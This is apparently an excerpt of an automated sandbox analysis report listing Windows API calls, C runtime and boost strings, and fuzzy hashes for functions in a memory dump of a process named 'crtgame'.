                                                                          • TerminateThread.KERNEL32(?,00000000), ref: 02BC1CD4
                                                                          • QueueUserAPC.KERNEL32(02BC1E7C,?,00000000), ref: 02BC1CE1
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02BC1CEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                          • String ID:
                                                                          • API String ID: 1946104331-0
                                                                          • Opcode ID: d64751f4493bb525ccfc7b9ee8be531aff11f8d279751b136da7f24989521b6c
                                                                          • Instruction ID: 24b1731329e93c1e21b2404a7ec75de5bce473292299bdf934e5d1628beed71f
                                                                          • Opcode Fuzzy Hash: d64751f4493bb525ccfc7b9ee8be531aff11f8d279751b136da7f24989521b6c
                                                                          • Instruction Fuzzy Hash: D4F08131950200FF9B209B9ADC0DC57FFBCEB85720B10469DF52AD6191DF7059109B60
                                                                          APIs
                                                                          • std::exception::exception.LIBCMT ref: 02BD137F
                                                                            • Part of subcall function 02BD1ED3: std::exception::_Copy_str.LIBCMT ref: 02BD1EEC
                                                                            • Part of subcall function 02BD0750: __CxxThrowException@8.LIBCMT ref: 02BD07AE
                                                                          • std::exception::exception.LIBCMT ref: 02BD13DE
                                                                          Strings
                                                                          • boost unique_lock owns already the mutex, xrefs: 02BD13CD
                                                                          • $, xrefs: 02BD13E3
                                                                          • boost unique_lock has no mutex, xrefs: 02BD136E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                          • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                          • API String ID: 2140441600-46888669
                                                                          • Opcode ID: 3fdc9db962c7125609d7195c80e32fb5044442a6bdbaf8650f7754aec6e11f76
                                                                          • Instruction ID: 39d176e145c5e5115f7d91bc70c23c19f73dbc371511dcc02b7aef55ffdae4aa
                                                                          • Opcode Fuzzy Hash: 3fdc9db962c7125609d7195c80e32fb5044442a6bdbaf8650f7754aec6e11f76
                                                                          • Instruction Fuzzy Hash: 7A2108B15187809FD750EF24C54479BBBE5AB84708F004E9DF4A687650E7B5D808CF92
                                                                          APIs
                                                                          • __getptd_noexit.LIBCMT ref: 02BD4480
                                                                            • Part of subcall function 02BD5672: GetLastError.KERNEL32(00000000,?,02BD5860,02BD2A33,00000000,?,02BD84CC,?,?,?,00000000,?,02BD83B9,00000018,02BF16D8,00000008), ref: 02BD5674
                                                                            • Part of subcall function 02BD5672: __calloc_crt.LIBCMT ref: 02BD5695
                                                                            • Part of subcall function 02BD5672: __initptd.LIBCMT ref: 02BD56B7
                                                                            • Part of subcall function 02BD5672: GetCurrentThreadId.KERNEL32 ref: 02BD56BE
                                                                            • Part of subcall function 02BD5672: SetLastError.KERNEL32(00000000,02BD84CC,?,?,?,00000000,?,02BD83B9,00000018,02BF16D8,00000008,02BD8306,?,?,?,02BD5588), ref: 02BD56D6
                                                                          • __calloc_crt.LIBCMT ref: 02BD44A3
                                                                          • __get_sys_err_msg.LIBCMT ref: 02BD44C1
                                                                          • __invoke_watson.LIBCMT ref: 02BD44DE
                                                                          Strings
                                                                          • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02BD448B, 02BD44B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                          • API String ID: 109275364-798102604
                                                                          • Opcode ID: 8e814721e618db2b8c0a7ead50a7faa151977d6726fd270f7f7e5d80e591ae0d
                                                                          • Instruction ID: 044211bb215f9e1898ba31580d1f0b77532f917f915f86191a8a91263e54c267
                                                                          • Opcode Fuzzy Hash: 8e814721e618db2b8c0a7ead50a7faa151977d6726fd270f7f7e5d80e591ae0d
                                                                          • Instruction Fuzzy Hash: 08F0E932900B146BEA31662A5C40AEB73FDEB417B0B0945E6FD45D6600FF75FC804E95
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                          • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                          • GetLastError.KERNEL32 ref: 02BC237A
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID: pqcs
                                                                          • API String ID: 1619523792-2559862021
                                                                          • Opcode ID: e50d71c3df6b13cd0610310871a7f18d38671032a2315ae1b90250a145c28b02
                                                                          • Instruction ID: a5d6a151ac3bf33a146f34b71752558f0bd1cff7dfeb8db9270a6d2ef5fbc1d8
                                                                          • Opcode Fuzzy Hash: e50d71c3df6b13cd0610310871a7f18d38671032a2315ae1b90250a145c28b02
                                                                          • Instruction Fuzzy Hash: 7BF0B470A40304AFDB20BF749809AABBBBCEB80341F1049AAFD09D7141FB70D9149B91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC4035
                                                                          • GetProcessHeap.KERNEL32(00000000,02BCA5C3,?,?,?,?,?,02BCA5C3), ref: 02BC4042
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02BC4049
                                                                          • std::exception::exception.LIBCMT ref: 02BC4063
                                                                            • Part of subcall function 02BCA053: __EH_prolog.LIBCMT ref: 02BCA058
                                                                            • Part of subcall function 02BCA053: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BCA067
                                                                            • Part of subcall function 02BCA053: __CxxThrowException@8.LIBCMT ref: 02BCA086
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 3112922283-2104205924
                                                                          • Opcode ID: 28b9807435bfda0e3cd6a67f047e90ffbfdd4266f3c39f5efe3fd3590359379c
                                                                          • Instruction ID: cab1bbad843c69982f4ba32a0d0ebdf4c55dc3326c9d7e0210f7fc6d3c479358
                                                                          • Opcode Fuzzy Hash: 28b9807435bfda0e3cd6a67f047e90ffbfdd4266f3c39f5efe3fd3590359379c
                                                                          • Instruction Fuzzy Hash: C5F05E72E44209DFDF10EFE4D818BAEB778EB04340F004599E916A6540DB7552148F51
                                                                          APIs
                                                                            • Part of subcall function 02BD1450: CloseHandle.KERNEL32(00000000,C2070DBA), ref: 02BD14A1
                                                                            • Part of subcall function 02BD1450: WaitForSingleObject.KERNEL32(?,000000FF,C2070DBA,?,?,?,?,C2070DBA,02BD1423,C2070DBA), ref: 02BD14B8
                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02BD171E
                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02BD173E
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02BD1777
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02BD17CB
                                                                          • SetEvent.KERNEL32(?), ref: 02BD17D2
                                                                            • Part of subcall function 02BC418C: CloseHandle.KERNEL32(00000000,?,02BD1705), ref: 02BC41B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 4166353394-0
                                                                          • Opcode ID: 7b4f16d51c908c29807b85f4df829e2171b086af5480604a6656cad56b6a452d
                                                                          • Instruction ID: 51393972abb4a315616c88587f85cc141acb1e0a8d597b36a2ebbf9e89e9bb89
                                                                          • Opcode Fuzzy Hash: 7b4f16d51c908c29807b85f4df829e2171b086af5480604a6656cad56b6a452d
                                                                          • Instruction Fuzzy Hash: BE41E1B06113058BDB259F2DCC80BA7B7E8EF45724F1806A8EC1CDB2A5E734D8018BA1
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC20AC
                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02BC20CD
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC20D8
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02BC213E
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                          • String ID:
                                                                          • API String ID: 1611172436-0
                                                                          • Opcode ID: 09cd6e40f6f66e3ad3a51f6977c7a163bf631a52981f3137f0c5978b2fec4c67
                                                                          • Instruction ID: 6820ce71b7de7ea2f6145d04cff7f5cdc9bbdb013893ca3366c4ad92d9b61aa8
                                                                          • Opcode Fuzzy Hash: 09cd6e40f6f66e3ad3a51f6977c7a163bf631a52981f3137f0c5978b2fec4c67
                                                                          • Instruction Fuzzy Hash: 73315A725047019FC710DF29C885A6BB7F9EFD8664F200A5EF89693650DB30E546CBA1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCDA89
                                                                            • Part of subcall function 02BC1A01: TlsGetValue.KERNEL32 ref: 02BC1A0A
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCDB08
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BCDB24
                                                                          • InterlockedIncrement.KERNEL32(02BF5170), ref: 02BCDB49
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BCDB5E
                                                                            • Part of subcall function 02BC27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02BC284E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                          • String ID:
                                                                          • API String ID: 1578506061-0
                                                                          • Opcode ID: 143658195fcd1346cd287e6a59091a5d0e6e6863a94b5050d01ab6067dd00be3
                                                                          • Instruction ID: 3b696b8bef62554f8302c939487853d0062ceda3b1de334bc6cd96a3c35870ab
                                                                          • Opcode Fuzzy Hash: 143658195fcd1346cd287e6a59091a5d0e6e6863a94b5050d01ab6067dd00be3
                                                                          • Instruction Fuzzy Hash: A53117B1905209DFCB10DFA9D5446AABBF8FB08310F1085AEE859D7641E774AA14CFA0
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC21DA
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21ED
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02BC2224
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02BC2237
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02BC2261
                                                                            • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                            • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                            • Part of subcall function 02BC2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                            • Part of subcall function 02BC2341: GetLastError.KERNEL32 ref: 02BC237A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1856819132-0
                                                                          • Opcode ID: e10deca538ca86a97b427acdcbf02b2265b64a6f54aaf345e885f4e37a47969f
                                                                          • Instruction ID: e2e070ff3ad58fcd47190817fae1de030630d7fea48ee903e1a34fd3931608b9
                                                                          • Opcode Fuzzy Hash: e10deca538ca86a97b427acdcbf02b2265b64a6f54aaf345e885f4e37a47969f
                                                                          • Instruction Fuzzy Hash: B8116D72D40219DBCF119FA8E8046AEFFBAFF44350F10459AE81597261EB714621EF81
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC229D
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC22B0
                                                                          • TlsGetValue.KERNEL32 ref: 02BC22E7
                                                                          • TlsSetValue.KERNEL32(?), ref: 02BC2300
                                                                          • TlsSetValue.KERNEL32(?,?,?), ref: 02BC231C
                                                                            • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                            • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                            • Part of subcall function 02BC2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                            • Part of subcall function 02BC2341: GetLastError.KERNEL32 ref: 02BC237A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1856819132-0
                                                                          • Opcode ID: ddeaeb1d89569f63ee0e319944807b28c2afde1e94f5b3e32d2a5b38ef71fa03
                                                                          • Instruction ID: 181f6e1dda243a6b651a3242a0af26b808fe813c4a88afd05fad28e2520e72f2
                                                                          • Opcode Fuzzy Hash: ddeaeb1d89569f63ee0e319944807b28c2afde1e94f5b3e32d2a5b38ef71fa03
                                                                          • Instruction Fuzzy Hash: CA115E72D10219DBCF11DFA5E8046AEFFBAFF44350F1044AAE805A3211DB714A21DF90
                                                                          APIs
                                                                            • Part of subcall function 02BCAAEE: __EH_prolog.LIBCMT ref: 02BCAAF3
                                                                          • __CxxThrowException@8.LIBCMT ref: 02BCB6B8
                                                                            • Part of subcall function 02BD3F5A: RaiseException.KERNEL32(?,?,?,02BF0F6C,?,00000400,?,?,?,02BD359C,?,02BF0F6C,00000000,00000001), ref: 02BD3FAF
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02BF1DA4,?,00000001), ref: 02BCB6CE
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BCB6E1
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02BF1DA4,?,00000001), ref: 02BCB6F1
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCB6FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                          • String ID:
                                                                          • API String ID: 2725315915-0
                                                                          • Opcode ID: 6b157f999739de4daeaecb0990183fce529c39521c202bd1e07a1c2b00f7ea64
                                                                          • Instruction ID: a6be7f97a4b6a254c37376610034ad91fafff5e75edc11b52b732f12f5387188
                                                                          • Opcode Fuzzy Hash: 6b157f999739de4daeaecb0990183fce529c39521c202bd1e07a1c2b00f7ea64
                                                                          • Instruction Fuzzy Hash: 66018676A40204AFDB10ABA4DC89F9BB7ADEB04369B1045A8F615D7191DB61E8158B20
                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2469
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2470
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 747265849-0
                                                                          • Opcode ID: 52a73e2f9021185ff4a668100dea8a181e97f9ddf2ef21ecd5a15bd13f6c34d8
                                                                          • Instruction ID: 4dddafe5bcdbf89cc7744a586e3dd5ea187d73110f0c10cda4d81ad351cd269d
                                                                          • Opcode Fuzzy Hash: 52a73e2f9021185ff4a668100dea8a181e97f9ddf2ef21ecd5a15bd13f6c34d8
                                                                          • Instruction Fuzzy Hash: 7BF03072640204BFDA10ABA0ED89FD6B72CFB44751F900865F701DB481DB71A921DBA1
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02BC1ED2
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02BC1EEA
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC1EF9
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC1F0E
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC1F15
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 830998967-0
                                                                          • Opcode ID: c8ab0e43bc26426f841ffdf374a1c553551f32ce74db3745e0c16ed3146d9890
                                                                          • Instruction ID: e6b184ca69cda356b9b7b3a0963536e6eb342ad11ac5b2470b43ed62decfaa11
                                                                          • Opcode Fuzzy Hash: c8ab0e43bc26426f841ffdf374a1c553551f32ce74db3745e0c16ed3146d9890
                                                                          • Instruction Fuzzy Hash: 2BF01772641604BFDB00AFA1ED88FC6BB2DFB54391F000466F6019B842DB61A6659BA0
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?), ref: 02BC30C3
                                                                          • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02BC3102
                                                                          • _memcmp.LIBCMT ref: 02BC3141
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressErrorLastString_memcmp
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 1618111833-2422070025
                                                                          • Opcode ID: d011d93e6035ce34ad161ebbb036b83ff0b7c1ef81c3f2e258e705232e8e80dc
                                                                          • Instruction ID: 49f31f901a2e6a7795488afbe639f8d6ca689de6d2f11750478297cce77503b2
                                                                          • Opcode Fuzzy Hash: d011d93e6035ce34ad161ebbb036b83ff0b7c1ef81c3f2e258e705232e8e80dc
                                                                          • Instruction Fuzzy Hash: 7931B571A007099FDB20AF64C8807AEB7E5EF45324F6089EDEC655B380EB719981CB91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC1F5B
                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02BC1FC5
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 02BC1FD2
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                          • String ID: iocp
                                                                          • API String ID: 998023749-976528080
                                                                          • Opcode ID: 9baee85b42ee3575a2d930f4e870f0a4f28202326330e3712a7df3b29167bef4
                                                                          • Instruction ID: 7d04e9f4310f90815a93d9b67e2a9cfac261c208415b343e7f075b9dce2a00b8
                                                                          • Opcode Fuzzy Hash: 9baee85b42ee3575a2d930f4e870f0a4f28202326330e3712a7df3b29167bef4
                                                                          • Instruction Fuzzy Hash: 0D2104B1801B448FCB20DF6AC50055BFBF8FF94720B108A5FD4AA93A90D7B0A604CF91
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 02BD3564
                                                                            • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
                                                                            • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
                                                                            • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
                                                                          • std::exception::exception.LIBCMT ref: 02BD3582
                                                                          • __CxxThrowException@8.LIBCMT ref: 02BD3597
                                                                            • Part of subcall function 02BD3F5A: RaiseException.KERNEL32(?,?,?,02BF0F6C,?,00000400,?,?,?,02BD359C,?,02BF0F6C,00000000,00000001), ref: 02BD3FAF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 3074076210-2104205924
                                                                          • Opcode ID: a9864e15cf75652738260bbe09e910958c954913a25992bd61fb6a37877f24e0
                                                                          • Instruction ID: 51051bcbe015a593bc818eaed2307b0061e794dd6d0619df3c6a3ffa7eca5a96
                                                                          • Opcode Fuzzy Hash: a9864e15cf75652738260bbe09e910958c954913a25992bd61fb6a37877f24e0
                                                                          • Instruction Fuzzy Hash: 1DE0307150020EAADF10FE64CD009EFBBB9AB00304F4045E5A815A6592FB719654DD92
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC37B6
                                                                          • __localtime64.LIBCMT ref: 02BC37C1
                                                                            • Part of subcall function 02BD2000: __gmtime64_s.LIBCMT ref: 02BD2013
                                                                          • std::exception::exception.LIBCMT ref: 02BC37D9
                                                                            • Part of subcall function 02BD1ED3: std::exception::_Copy_str.LIBCMT ref: 02BD1EEC
                                                                            • Part of subcall function 02BC9EB1: __EH_prolog.LIBCMT ref: 02BC9EB6
                                                                            • Part of subcall function 02BC9EB1: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BC9EC5
                                                                            • Part of subcall function 02BC9EB1: __CxxThrowException@8.LIBCMT ref: 02BC9EE4
                                                                          Strings
                                                                          • could not convert calendar time to UTC time, xrefs: 02BC37CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                          • String ID: could not convert calendar time to UTC time
                                                                          • API String ID: 1963798777-2088861013
                                                                          • Opcode ID: 5f84b3a7cb0111d3b0adcdd2937b9223c1825d42cf71ba9b47f184e844194d9c
                                                                          • Instruction ID: bcf7f6dd383339d640d0bdcbc9150c3c94c0eaae017cb4878833508545514aab
                                                                          • Opcode Fuzzy Hash: 5f84b3a7cb0111d3b0adcdd2937b9223c1825d42cf71ba9b47f184e844194d9c
                                                                          • Instruction Fuzzy Hash: EDE06DB2D0010E9BCF14EFA4D9007EEB7B9FF04304F5085E9D816A2241EB3456098F84
                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD0DBF
                                                                            • Part of subcall function 02BC3FDC: __EH_prolog.LIBCMT ref: 02BC3FE1
                                                                            • Part of subcall function 02BC3FDC: CreateEventA.KERNEL32(00000000,02BCA5C3,?,00000000), ref: 02BC3FF3
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD0DB4
                                                                          • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD0E00
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD0ED1
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$Event$CreateH_prolog
                                                                          • String ID:
                                                                          • API String ID: 2825413587-0
                                                                          • Opcode ID: a457c37d406e2744159b6762c7b952fbca3588e6f45d08c39ba322ef88949515
                                                                          • Instruction ID: 6a051ea85ff717708c7070ce70fc0a3e16b3d5daa1f97f5723bd993576046101
                                                                          • Opcode Fuzzy Hash: a457c37d406e2744159b6762c7b952fbca3588e6f45d08c39ba322ef88949515
                                                                          • Instruction Fuzzy Hash: FE51B3719003458BDB11EF28C8847DABBE4EF48328F190A99EC6D97390E735E845CF91
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02BDF94B
                                                                          • __isleadbyte_l.LIBCMT ref: 02BDF979
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02BDF9A7
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02BDF9DD
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
